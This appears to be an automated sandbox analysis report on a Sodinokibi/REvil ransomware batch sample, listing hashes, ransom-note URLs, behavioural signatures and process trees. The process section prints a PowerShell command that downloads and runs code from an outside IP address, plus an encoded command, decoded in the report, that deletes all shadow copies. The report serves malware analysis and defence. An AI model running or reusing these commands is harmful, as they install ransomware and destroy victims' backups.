Analysis
- max time kernel: 145s
- max time network: 53s
- platform: windows7_x64
- resource: win7v200430
- submitted: 15-05-2020 20:10

- Static task: static1
- Behavioral task: behavioral1 (sample 55022f44a9c2dac0916e9db3842398df.bat, resource win7v200430)
- Behavioral task: behavioral2 (sample 55022f44a9c2dac0916e9db3842398df.bat, resource win10v200430)
General
- Target: 55022f44a9c2dac0916e9db3842398df.bat
- Size: 219B
- MD5: 07ea4461f7fc0758bb7fb455966df5d9
- SHA1: 2df15ea78ad89a7816a69bab5656274115bed854
- SHA256: dd540cd255b16f023dee940fffa52d054726d7f2c1c9aeaeafc4f594a3e2a5f1
- SHA512: b0ea53a6359157114b09bddf227d1bfedcd7db302c356e99e1086b736fc003b6a2f40647a6feecf6f5642104bbf8e7b9a49668c29a5f1c0857fcf1538419414d
Malware Config
- Extracted: http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df
- Extracted from C:\32rjr23-readme.txt
  - Family: sodinokibi
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/364473B984C95D99
  - http://decryptor.cc/364473B984C95D99
Signatures
- Enumerates connected drives (3 TTPs)

- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 1304 wrote to memory of 1396 | 1304 | cmd.exe | powershell.exe
  PID 1396 wrote to memory of 1100 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1100 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1100 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1100 | 1396 | powershell.exe | powershell.exe

- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  1396 | powershell.exe (first 3 entries)
  1100 | powershell.exe (next 2 entries)
  1396 | powershell.exe (every remaining entry)

- Blacklisted process makes network request (1 IoCs)
  Processes: powershell.exe
  flow | pid | process
  2 | 1396 | powershell.exe

- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe

- Drops file in Program Files directory (17 IoCs)
  Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\program files\CopyMove.dib | powershell.exe
  File opened for modification | \??\c:\program files\ExportConfirm.vst | powershell.exe
  File opened for modification | \??\c:\program files\MeasureCompare.rtf | powershell.exe
  File opened for modification | \??\c:\program files\StartEdit.php | powershell.exe
  File opened for modification | \??\c:\program files\UninstallPop.vsdm | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\32rjr23-readme.txt | powershell.exe
  File created | \??\c:\program files\32rjr23-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\BackupDisconnect.wmx | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\32rjr23-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\RedoRegister.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\SendSubmit.tif | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\32rjr23-readme.txt | powershell.exe
  File created | \??\c:\program files (x86)\32rjr23-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ConvertStep.wpl | powershell.exe
  File opened for modification | \??\c:\program files\FindUninstall.midi | powershell.exe
  File opened for modification | \??\c:\program files\PingSuspend.docx | powershell.exe
  File opened for modification | \??\c:\program files\UninstallUnblock.wmv | powershell.exe

- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ii0lpas68.bmp" | powershell.exe

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes: powershell.exe
  pid | process
  1396 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1396 | powershell.exe
  Token: SeDebugPrivilege | 1396 | powershell.exe
  Token: SeDebugPrivilege | 1100 | powershell.exe
  Token: SeBackupPrivilege | 656 | vssvc.exe
  Token: SeRestorePrivilege | 656 | vssvc.exe
  Token: SeAuditPrivilege | 656 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1396 | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (level 1, PID 1304)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 1396)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"
    Signatures:
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3, PID 1100)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE; decoded it reads: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. removal of all volume shadow copies, consistent with the vssvc.exe activity recorded below)
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\vssvc.exe (level 1, PID 656)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken